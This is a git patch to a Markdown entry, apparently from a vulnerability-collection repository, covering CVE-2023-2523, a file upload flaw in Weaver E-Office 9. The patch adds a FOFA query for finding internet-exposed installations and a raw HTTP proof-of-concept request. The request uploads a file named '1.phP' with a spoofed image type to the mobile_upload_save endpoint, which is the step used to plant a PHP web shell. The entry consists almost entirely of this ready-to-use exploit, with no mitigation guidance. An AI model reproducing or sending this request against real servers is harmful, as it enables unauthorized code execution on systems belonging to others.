From abe7c0201b732f6293188054b8f8f0cec26c4bd9 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Sun, 7 Jan 2024 14:51:41 +0800 Subject: [PATCH] =?UTF-8?q?Update=20=E6=9F=90=E5=BE=AEE-Office9=E6=96=87?= =?UTF-8?q?=E4=BB=B6=E4=B8=8A=E4=BC=A0=E6=BC=8F=E6=B4=9E=20CVE-2023-2523.m?= =?UTF-8?q?d?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- 某微E-Office9文件上传漏洞 CVE-2023-2523.md | 40 +++++++++++++++------- 1 file changed, 27 insertions(+), 13 deletions(-) diff --git a/某微E-Office9文件上传漏洞 CVE-2023-2523.md b/某微E-Office9文件上传漏洞 CVE-2023-2523.md index 6db7c2a..86fa262 100644 --- a/某微E-Office9文件上传漏洞 CVE-2023-2523.md +++ b/某微E-Office9文件上传漏洞 CVE-2023-2523.md @@ -1,20 +1,34 @@ ## 某微E-Office9文件上传漏洞 CVE-2023-2523 +## fofa ``` -POST/Emobile/App/Ajax/ajax.php?action=mobile_upload_save HTTP/1.1 -Host:192.168.233.10:8082 -Cache-Control:max-age=0 -Upgrade-Insecure-Requests:1 -Origin:null -Content-Type:multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt -Accept-Encoding:gzip, deflate -Accept-Language:en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7 -Connection:close +app="泛微-EOffice" +``` + +## poc +``` +POST /E-mobile/App/Ajax/ajax.php?action=mobile_upload_save HTTP/1.1 +Host: XXXX:XXX +Content-Length: 349 +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +Origin: null +Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7 +Connection: close ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt -Content-Disposition:form-data; name="upload_quwan"; filename="1.php." -Content-Type:image/jpeg - -------WebKitFormBoundarydRVCGWq4Cx3Sq6tt +Content-Disposition: form-data; name="upload_quwan"; filename="1.phP" +Content-Type: image/jpeg + +------WebKitFormBoundarydRVCGWq4Cx3Sq6tt +Content-Disposition: form-data; name="file"; filename="" +Content-Type: application/octet-stream + + +------WebKitFormBoundarydRVCGWq4Cx3Sq6tt-- ```